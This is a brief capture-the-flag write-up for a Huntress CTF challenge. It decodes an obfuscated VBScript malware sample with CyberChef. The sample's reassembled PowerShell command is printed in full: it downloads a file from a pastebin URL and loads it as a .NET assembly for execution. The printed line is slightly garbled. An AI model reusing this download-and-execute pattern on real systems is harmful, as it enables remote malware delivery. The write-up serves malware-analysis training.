Huntress CTF (VeeBeeEes)
The malware file you are given to inspect is called veebeeeee, a Visual Basic Script file.
Cyberchef has a tool called Microsoft Script Decoder
When you upload the veebeeeee file to cyberchef and use the decoder, you get the output in the screenshots.
Taking out all the ', al37ysoeopm'al37ysoeopm and " " makes things much easier to see
We can see there are methods:
Power = Power0 + Power1 + Power2 + Power3 + Power4 + Power5
Path = Path0 + Path1 + Path2 + Path3 + Path4 + Path5
Reqest = Reqest0 + Reqest1 + Reqest2 + Reqest3 + Reqest4 + Reqest5
InvokeReqest = InvokeReqest0 + InvokeReqest1 + InvokeReqest2 + InvokeReqest3 + InvokeReqest4 + InvokeReqest5
ExecAssem = ExecAssem0 + ExecAssem1 + ExecAssem2 + ExecAssem3 + ExecAssem4 + ExecAssem5
And finally:
CollectThenReplace Power , Path , Reqest , InvokeReqest , ExecAssem
Once you concatenate all the values you get:
PowerShell$f='C:\Users\Public\Documents\July.htm'; if (!(Test-Path $f)){Invoke-WebRequest 'https://pastebin.com/raw/SiYGwwcz' -outfile $f }; [System.Reflection.Assembly]::loadfy]::loadfile($f); [WorkAreaWork]:Exe()
Flag is contained in https://pastebin.com/raw/SiYGwwcz














